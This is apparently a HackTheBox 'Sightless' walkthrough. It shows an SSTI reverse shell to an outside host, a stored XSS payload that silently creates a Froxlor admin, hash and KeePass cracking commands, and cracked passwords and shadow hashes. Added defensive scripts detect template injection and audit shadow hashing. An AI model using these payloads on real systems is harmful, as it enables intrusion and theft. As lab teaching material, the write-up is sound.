Basic information

Port scan

Ports 21, 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.32
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-10 13:57 CST
Nmap scan report for 10.10.11.32
Host is up (0.093s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=9/10%Time=66DFDFFB%P=x86_64-apple-darwin23.4.0%
SF:r(GenericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\
SF:x20Server\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\
SF:x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20tr
SF:y\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.23 seconds

80

The site redirects to sightless.htb, so a hosts entry is needed:

10.10.11.32 sightless.htb

It's a company website:

SQLPad

The page lists several services; sqlpad is a new subdomain, so add it to hosts as well:

sqlpad.sightless.htb

It's a web-based database connection management tool:

Testing the normal functionality turned up nothing.

SSTI

A search turns up a known vulnerability:

Exploiting it gives a root shell inside the container:

{{ process.mainModule.require('child_process').exec('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.17/4444 0>&1"') }}

michael & user flag

Looking around the container reveals a non-default user, michael, whose hash in /etc/shadow can be cracked:

michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::

sudo hashcat -m 1800 hash.txt ~/Tools/dict/rockyou.txt

insaneclownposse

Then SSH into the host as michael to get the user flag:

froxlor

Checking listening ports reveals a local 8080; forward it out to take a look:

ssh michael@10.10.11.32 -L 8081:127.0.0.1:8080

It's a Froxlor instance:

Unintended route

The unintended route here goes through the browser debugger, because the intended route is XSS and the box simulates an administrator logging in periodically.

Intended route: XSS

A search turns up this:

Adjust the payload (the address, username and so on), submit it, wait for it to trigger, then log in with our new user:

XSS payload

admin{{$emit.constructor`function+b(){var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3bvar+csrfToken%3dmetaTag.getAttribute('content')%3bvar+xhr%3dnew+XMLHttpRequest()%3bvar+url%3d"http%3a//admin.sightless.htb%3a8080/admin_admins.php"%3bvar+params%3d"new_loginname%3dmiao%26admin_password%3dMiao%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dMiao%26email%3dyldrmtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3bxhr.open("POST",url,true)%3bxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3balert("Your+Froxlor+Application+has+been+completely+Hacked")%3bxhr.send(params)}%3ba%3db()`()}}
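Both injection points on this page, the SQLPad connection field and the Froxlor admin name, take the same shape: a `{{ ... }}` template expression that climbs from an ordinary object to a JavaScript constructor or to Node's require(). The following screening helper, written here as an added example and not code from SQLPad, Froxlor or this writeup, decodes submitted form values and flags that shape so it can be logged or rejected before a template engine sees it. The parameter names and sample values are constructed for the example.

```python
"""Screen request parameters for template-expression injection.

Added example; it is not SQLPad's or Froxlor's own code. Parameter
names and sample values below are constructed for illustration.
"""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Everything between a pair of double braces, shortest match.
MUSTACHE = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)

# Tokens that show an expression reaching for execution rather than a value.
SUSPICIOUS = (
    "constructor",   # the Function constructor is reachable from any object
    "process.",      # Node global, start of the mainModule.require chain
    "require(",      # loading a module from inside a template expression
    "child_process",
    "$emit",         # Vue instance method whose constructor is Function
    "__proto__",
)

# Identifier, bracket or paren immediately followed by a backtick:
# a tagged-template call, which invokes a function without parentheses.
TAGGED_CALL = re.compile(r"[\w\]\)]`")


def find_template_injection(value: str) -> List[str]:
    """Return the reasons a single decoded value looks like template injection."""
    reasons: List[str] = []
    for match in MUSTACHE.finditer(value):
        body = match.group(1)
        hits = [tok for tok in SUSPICIOUS if tok in body]
        if hits:
            reasons.append("expression references " + ", ".join(hits))
        if TAGGED_CALL.search(body):
            reasons.append("tagged-template call inside expression")
    return reasons


def screen_request(params: Dict[str, str]) -> Dict[str, List[str]]:
    """Decode each parameter as a form value and return only the flagged ones."""
    flagged: Dict[str, List[str]] = {}
    for name, raw in params.items():
        reasons = find_template_injection(unquote_plus(raw))
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed sample request: two benign values (one of them a harmless
# display expression), one shaped like the SQLPad connection payload and
# one shaped like the Froxlor admin-name payload.
SAMPLE_PARAMS = {
    "name": "Production warehouse",
    "comment": "Hello {{ user.name }}, welcome back",
    "host": "{{ process.mainModule.require('child_process') }}",
    "loginname": "admin{{$emit.constructor`PLACEHOLDER`()}}",
}

if __name__ == "__main__":
    for name, reasons in screen_request(SAMPLE_PARAMS).items():
        print(name, "->", "; ".join(reasons))
```

The check deliberately ignores plain `{{ user.name }}` style expressions and only reacts to tokens that reach for code execution, so it can sit in front of a form handler as a logging or blocking rule without flagging ordinary templated text.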

FTP

In Froxlor, the FTP password for web1 can be changed:

Then log in over FTP and retrieve a KeePass file:

Database.kdb

Crack the password the usual way:

keepass2john Database.kdb > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

bulldogs

Then open Database.kdb to get root's private key and password:

q6gnLTB74L132TMdFCpK

root flag

Fix the file's line endings, then SSH in with the private key:

dos2unix root_id_rsa

shadow

root:$y$j9T$PScOTu/SFg7oaa/bfW4pL0$7oWEYAy0P18E3uDpsZUyoy78cubBKODqotqtAp4GtK0:19860:0:99999:7:::
michael:$y$j9T$VdjDEROmqIwhwxW5Mqie//$yo5dlS5BvDOm5r4snRGg6JQp2lK2Vip3mC5.A.e94S3:19860:0:99999:7:::
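The two shadow dumps on this page show two different schemes: the container's michael hash is `$6$` (sha512crypt, hashcat mode 1800), which a rockyou run recovered, while the host's root and michael hashes are `$y$` (yescrypt). The script below is an added example, not part of the writeup, that parses shadow-format lines and reports which scheme protects each account, so legacy or passwordless entries stand out in an audit. The sample lines are constructed with placeholder hash bodies; only the prefix matters for classification.

```python
"""Audit /etc/shadow entries for the password-hashing scheme in use.

Added example, not part of the original writeup. Sample lines below are
constructed; the hash bodies are placeholders, not real digests.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Optional, Tuple

# Prefix -> (scheme name, hashcat mode). Mode 1800 is the one the writeup
# uses for sha512crypt; yescrypt has no hashcat mode and is left as None.
SCHEMES = {
    "$1$": ("md5crypt", 500),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$y$": ("yescrypt", None),
}
EPOCH = date(1970, 1, 1)


@dataclass
class ShadowEntry:
    user: str
    scheme: str
    hashcat_mode: Optional[int]
    last_change: Optional[date]   # field 3 is days since the epoch
    findings: List[str]


def classify(field: str) -> Tuple[str, Optional[int], List[str]]:
    """Return (scheme, hashcat_mode, findings) for one password field."""
    if field == "":
        return "none", None, ["empty password field: login without a password if nullok is allowed"]
    if field.startswith(("!", "*")):
        return "locked", None, []
    for prefix, (name, mode) in SCHEMES.items():
        if field.startswith(prefix):
            findings = []
            if name == "md5crypt":
                findings.append("legacy md5crypt: force a rehash on next login")
            elif name in ("sha256crypt", "sha512crypt"):
                findings.append("sha-crypt family: weak passwords fall quickly to GPU wordlist attacks; migrate to yescrypt")
            return name, mode, findings
    return "unknown", None, ["unrecognised hash format"]


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow-format lines (user:hash:lastchg:min:max:warn:inact:expire:)."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            continue
        scheme, mode, findings = classify(fields[1])
        last_change = EPOCH + timedelta(days=int(fields[2])) if fields[2] else None
        entries.append(ShadowEntry(fields[0], scheme, mode, last_change, findings))
    return entries


def weak_accounts(entries: List[ShadowEntry]) -> List[ShadowEntry]:
    """Entries with at least one finding, in file order."""
    return [e for e in entries if e.findings]


# Constructed sample: one sha512crypt user like the container's michael,
# one yescrypt user like the host's root, a locked service account,
# a legacy md5crypt account and an account with no password at all.
SAMPLE_SHADOW = """\
michael:$6$mG3Cp2VP$PLACEHOLDER_SHA512CRYPT_BODY:19860:0:99999:7:::
root:$y$j9T$PLACEHOLDER_SALT$PLACEHOLDER_YESCRYPT_BODY:19860:0:99999:7:::
www-data:*:19860:0:99999:7:::
legacy:$1$abcdefgh$PLACEHOLDER_MD5CRYPT_BODY:15000:0:99999:7:::
svc::19860:0:99999:7:::
"""

if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        mode = "" if e.hashcat_mode is None else f" (hashcat -m {e.hashcat_mode})"
        print(f"{e.user:10} {e.scheme}{mode} last change {e.last_change}")
        for f in e.findings:
            print(f"{'':10}  ! {f}")
```

Run against a real shadow file, the output lets you see at a glance whether every account is on yescrypt, as the host on this page is, or whether something like the container's sha512crypt hash is still lingering where a wordlist attack would find it.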

References